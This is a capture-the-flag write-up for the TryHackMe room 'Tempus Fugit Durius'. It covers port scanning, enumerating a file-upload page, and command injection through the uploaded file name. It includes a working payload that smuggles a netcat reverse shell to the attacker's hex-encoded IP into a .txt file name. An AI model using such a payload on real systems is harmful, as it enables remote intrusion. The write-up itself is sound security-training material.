TryHackMe - Tempus Fugit Durius

Nmap

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 b1:ac:a9:92:d3:2a:69:91:68:b4:6a:ac:45:43:fb:ed (DSA)
|   2048 3a:3f:9f:59:29:c8:20:d7:3a:c5:04:aa:82:36:68:3f (RSA)
|   256 f9:2f:bb:e3:ab:95:ee:9e:78:7c:91:18:7d:95:84:ab (ECDSA)
|_  256 49:0e:6f:cb:ec:6c:a5:97:67:cc:3c:31:ad:94:a4:54 (ED25519)
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Tempus Fugit Durius
|_http-trane-info: Problem with XML parsing of /evox/about
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36350/udp6  status
|   100024  1          40573/tcp   status
|   100024  1          50794/udp   status
|_  100024  1          54565/tcp6  status
40573/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

HTTP

Checking Port 80, shows the following page:

Gobuster

I tried to run gobuster but everything returns a 200 OK, so time to do some manual enumeration.

gobuster dir -u http://10.10.174.220 -w /usr/share/wordlists/dirb/common.txt -e .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.174.220
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/05/18 17:56:13 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.174.220/085aca89-6cca-43b0-9d55-dd3fab285f8d => 200. To force processing of Wildcard responses, specify the '--wildcard' switch  

Checking the Upload Page

I tried uploading a PHP web shell, but it failed.

The application states that it only accepts txt and rtf files.

Uploading a TXT file

# I create a TXT file
echo "This is a test from squid22" > squid22.txt

Based on the upload message, I can see that the application reads the content of my TXT file.

Checking Possible RCE

This time, I upload the same TXT file, but I add the command id to see what happens.

And that worked.

Exploit

Trying to get a shell with netcat was a bit of a hit and miss. Every time, I tried something different, I got a message saying the file name was way too long.

After some research and a lot of failed shell execution, I managed to get a shell using my IP addresses encoded in hex.

My code to get a shell

"#;nc 0x0A0B07BC 53 -w sh;a.txt"

If you try that on your our Kali machine, you can see that bash interprets the IP address in hex and it works fine. The reason for the a.txt at the end was due to the file filter which only allows TXT and RTF.

Code Research

Only allows TXT and RTF

And here is why the IP address was failing...

Privilege Escalation

We find some creds under the /app directory which allows us to login as root.